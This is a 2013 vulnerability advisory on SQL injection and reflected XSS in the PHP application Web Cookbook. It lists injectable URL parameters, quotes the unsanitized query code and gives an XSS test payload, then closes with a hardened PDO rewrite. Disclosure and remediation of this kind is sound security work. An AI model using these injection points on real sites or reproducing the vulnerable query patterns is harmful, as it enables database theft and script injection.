
# Title : Web Cookbook - Multiple SQL Injection Vulnerabilities
# Published : 2013-03-13


# Exploit Title: Web Cookbook Multiple SQL Injection
# Date: 2013/3/12
# Exploit Author: Saadat Ullah  saadi_linux@rocketmail.com
# Software Link: http://sourceforge.net/projects/webcookbook/
# Author HomePage: http://security-geeks.blogspot.com/
# Tested on: Server: Apache/2.2.15 (Centos) PHP/5.3.3

# SQL Injection

http://localhost/cook/searchrecipe.php?sstring=[SQLi]
http://localhost/cook/showtext.php?mode=[SQLi]
http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient=


http://localhost/cook/showtext.php?mode=[SQLi]
#Proof Of Concept
In showtext.php
Code:
$mode = $_GET["mode"];
.
.
showText($mode, $art);//sending $mode to a function without sanitizing it
.
.
function showText($kategorie, $art) {
	initDB();
	echo "<div class=\"rdisplay\">\n";
	$query = "SELECT * FROM dat_texte WHERE id = $kategorie"; //using an unsanitized field in the query
	$result = mysql_query($query);
.
.
All GET fields are vulnerable to SQLi
http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient=
#Proof Of Concept
In searchrecipe.php
	$title = $_GET['title'];
	$prefix = $_GET['prefix'];
	$preparation = $_GET['preparation'];
	$postfix = $_GET['postfix'];
	$tipp = $_GET['tipp'];
	$ingredient = $_GET['ingredient'];
	.
	.
	.
	if ($title != "") {
		$sstring = "a.title LIKE '%$title%' ";
	}
	.
	.
	searchRecipe($mode, $sstring);
	.
	.
	In function searchRecipe
				$query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title";


http://localhost/cook/searchrecipe.php?sstring=[SQLi]
#Proof Of Concept
$sstring = $_GET['sstring'];
		if ($sstring != "") {
			searchRecipe(0, $sstring);
.
.
.
	$query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title";


A simple non-persistent (reflected) XSS
http://localhost/cook/searchrecipe.php?mode=1&title=<script>alert('hi');</script>&prefix=&preparation=&postfix=&tipp=&ingredient=
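How a maintainer would close the three issues quoted above, as an added example that is not Web Cookbook's own code: the `showText()` id is validated as an integer and bound as a typed parameter, the `searchRecipe()` LIKE term is passed as a bound parameter with its `%`/`_` wildcards escaped, and the reflected search term is HTML-encoded before it is echoed. Table and column names (`dat_texte`, `das_rezept`, `dat_ingredient`, `a.title`, `b.description`, `b.recipe`) come from the advisory; the DSN, credentials and the `*Safe` function names are placeholders chosen for this example.

```php
<?php
// Added example, not Web Cookbook's code: hardened equivalents of the
// showText() and searchRecipe() fragments from the advisory. Connection
// settings below are placeholders.
declare(strict_types=1);

function initDB(): PDO {
    return new PDO(
        'mysql:host=localhost;dbname=cookbook;charset=utf8mb4', // placeholder DSN
        'DB_USER_PLACEHOLDER',
        'DB_PASSWORD_PLACEHOLDER',
        [
            PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
            // Server-side prepares: parameters never touch the SQL text.
            PDO::ATTR_EMULATE_PREPARES => false,
        ]
    );
}

function h(string $s): string {
    // Output encoding for HTML body and attribute context.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// showtext.php: id is numeric, so anything that is not a positive integer is
// rejected before a query is built, and the value is bound as an INT.
function showTextSafe(PDO $pdo, string $rawMode): void {
    $id = filter_var($rawMode, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);
        echo 'Invalid id';
        return;
    }
    $stmt = $pdo->prepare('SELECT * FROM dat_texte WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();

    echo "<div class=\"rdisplay\">\n";
    while ($row = $stmt->fetch(PDO::FETCH_ASSOC)) {
        foreach ($row as $value) {
            echo '<p>' . h((string) $value) . "</p>\n";
        }
    }
    echo "</div>\n";
}

// Escape LIKE metacharacters so a search term cannot be turned into a
// match-everything wildcard. '!' is declared as the escape char in the SQL.
function escapeLike(string $term): string {
    return str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $term);
}

// searchrecipe.php: the quote-breakout from the advisory is closed by binding
// the pattern; the same pattern is bound twice because MySQL does not allow
// one named placeholder to be reused when emulation is off.
function searchRecipeSafe(PDO $pdo, string $title): array {
    $pattern = '%' . escapeLike($title) . '%';
    $sql = "SELECT DISTINCT a.id, a.title
              FROM das_rezept a
              JOIN dat_ingredient b ON a.id = b.recipe
             WHERE a.title LIKE :p1 ESCAPE '!'
                OR b.description LIKE :p2 ESCAPE '!'
             ORDER BY a.title";
    $stmt = $pdo->prepare($sql);
    $stmt->bindValue(':p1', $pattern, PDO::PARAM_STR);
    $stmt->bindValue(':p2', $pattern, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Wiring that mirrors the two entry points from the advisory.
$pdo = initDB();
if (isset($_GET['title'])) {
    $title = (string) $_GET['title'];
    // The reflected term (the XSS vector above) is encoded on output.
    echo '<p>Results for: ' . h($title) . "</p>\n<ul>\n";
    foreach (searchRecipeSafe($pdo, $title) as $row) {
        echo '<li>' . h((string) $row['title']) . "</li>\n";
    }
    echo "</ul>\n";
} elseif (isset($_GET['mode'])) {
    showTextSafe($pdo, (string) $_GET['mode']);
}
```

Two design points: the join condition moves into `ON`, so the `OR ... AND` precedence ambiguity of the original query disappears, and the explicit `ESCAPE '!'` makes the wildcard escaping independent of the server's `NO_BACKSLASH_ESCAPES` setting. The `$sstring` path of `searchrecipe.php` takes the same treatment as `$title`, since both end up in the same LIKE clause.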


#Independent Pakistani Security Researcher